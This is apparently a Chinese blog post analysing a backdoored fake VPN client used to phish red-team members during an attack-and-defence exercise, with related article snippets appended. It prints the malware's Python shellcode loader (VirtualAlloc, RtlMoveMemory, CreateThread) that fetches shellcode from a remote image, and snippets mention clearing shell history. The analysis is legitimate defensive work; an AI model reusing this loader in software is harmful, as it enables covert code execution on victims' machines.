<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰 | 某次攻防演練中的分析溯源

    VSole2022-11-25 22:58:53
    在某次攻防演練信息收集的過程中,偶然發現偽裝Github信息泄漏進而釣魚紅隊人員的后門。
    下面展開有趣的分析溯源過程。

    信息收集

    GIthub信息泄漏

    根據甲方信息進行常規的Github敏感信息收集偶然發現一個倉庫不簡單

    這不是mysql賬號密碼泄漏了嗎,愉快的打開Navicat

    失敗....于是訪問源碼的8080端口查看一番,發現一個管理后臺

    弱口令

    針對后臺嘗試一波弱口令,admin/admin 嗯~進來了

    進來之后竟然發現賬號密碼而且客戶端解壓密碼都貼心的放了出來

    到這里我竟然沒有察覺到任何異常,以為能夠拿到VPN入口權限;抓緊下載VPN客戶端。

    解壓出來這個樣子,emmm。。還沒發現異常

    分析溯源

    還好有謹慎的習慣,放入虛擬機瞅瞅。

    哦豁,竟然提示不兼容當前系統;看到彈窗有Pyhton代碼編寫的特征。感覺到前面的打點由過于絲滑,不自然的警覺了起來。

    包括前面弱口令的提交方式竟然為admin.php?user=admin&passwd=admin

    由于發現VPN客戶端為python語言編寫,更不對勁了,反編譯看下。

    解包


    python3 pyinstxtractor.py vpnclient64.exe
    

    生成一個以 exe文件名+_extracted 的文件夾,這個就是解包后的數據

    PyInstaller打包后,pyc文件的前8個字節會被抹掉,所以最后要自己添加回去。

    添加頭

    根據struct.py文件

    源碼

    得到py文件,easyvpn64.py為后門主程序,其中執行shellcode代碼隱藏至圖片中。

    通過requests請求OSS存儲中的圖片,圖片內容為shellcode加載器。

    shellcodeLoader部分

    import base64import ctypesstr = b''sc_base64 = (base64.a85decode(str)).decode('utf-8')shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0),
                                                 ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
    

    知道shellcodeloader加載方式就好辦了,提取CS回連地址。

    溯源

    回連地址:Host: cs.xxx.cn

    nslookup解析地址

    根據IP地址定位在某宿舍

    直接溯源到人,tg結合一波。

    總結

    在攻防演練過程中一定要小心,防止被釣魚。另外這個釣魚的兄弟已經小本本記下了。。。

    溯源
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    說明攻擊者已經進入內網環境,分兩條線分別對攻擊入口和內網影響面進行排查。但audit和system賬戶權限有限,并不會直接控制終端。此外,在審計用戶的后臺還發現,admin賬戶的密碼被修改過,操作者時admin本人,登錄IP為攻擊隊控制的跳板機,修改后密碼后,admin賬戶成功登錄。此時已經凌晨3點多。第二天與客戶溝通后發現,該VRV是用于VPN接入時進行管控的,而VPN在4月8日晚上已經關閉。
    溯源(attribution)是解決網絡攻擊的起點,通過指出并懲罰真正的攻擊者以震懾其他潛在罪犯,阻止未來可能發生的攻擊。伴隨國家間網絡空間博弈的日趨激烈,一些國家越來越傾向于使用強大的網絡攻擊溯源能力塑造國際敘事,渲染放大網絡威脅,為其采取起訴、制裁等單邊措施提供托詞。
    入侵檢測與威脅分析系統的研發為對抗攻擊提供了更直接、響應速度更快的新方法。
    溯源反制思路整合
    2021-07-27 09:41:52
    溯源反制思路整合0x01反制的整體思路0x02 反制具體思路0x0201 反制主機0x0202 反制后門附件
    前言最近看到幾篇有關WebRTC泄露源IP的文章,這個問題其實很多年前就有人提出來了,只是當時沒咋引起重視;最近看又有師傅提起了,寫篇文章簡單記錄分享下。目前想到在實戰中可利用的場景有:HW攻防演練、BC/ZP溯源對方真實IP等...。0x01 泄露原因瀏覽器支持WebRTC并在沒被禁用的情況下就有可能會泄露源IP地址,如常用的:Chrome、Firefox、Edga等瀏覽器均支持WebRTC。
    真實溯源筆記思路
    2022-12-04 09:54:30
    0x01 嘗試獲取getshell提權根據獲取的資產信息,進行滲透(awvs等工具)0x02 第一次提權后的信息收集查看歷史的shell命令是否存在數據:取消shell命令歷史記錄:set + o history刪除上一步的取消命令:history -d id查詢登錄過當前系統的IP:last,定位該IP進行該IP的第一次信息收集同上系統信息收集:內核,系統版本情況等,嘗試是否可以提權操作查看你進
    攻擊者溯源反制
    2022-08-19 22:30:11
    攻擊者溯源反制
    事件溯源是高性能協作域的一種很好的架構風格,可以保證它增加的復雜性。但正如我之前所說,就像任何其他原則或實踐一樣,即使是事件溯源也有利有弊。而且它不是頂級架構。您系統的某些部分可能會從中受益,但其他部分可能不會。話雖如此,如果您需要事件溯源,并且您有一個現有的、更傳統的(又名 CRUD)應用程序,您可以遵循大致三種策略:
    溯源是攻防過程中的重要一環,其主要目的為防止防守方快速找出屏幕后,正在摳腳的你。滲透過程中有沒有"事了拂衣去"的灑脫,很大程度在于過程中反溯源技術的應用程度。
    溯源排查中比較重要的一環是web突破口排查,攻擊者通過web突破口入侵時,有極大的概率會寫入webshell,本文介紹下常見的webshell排查方法和流程。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类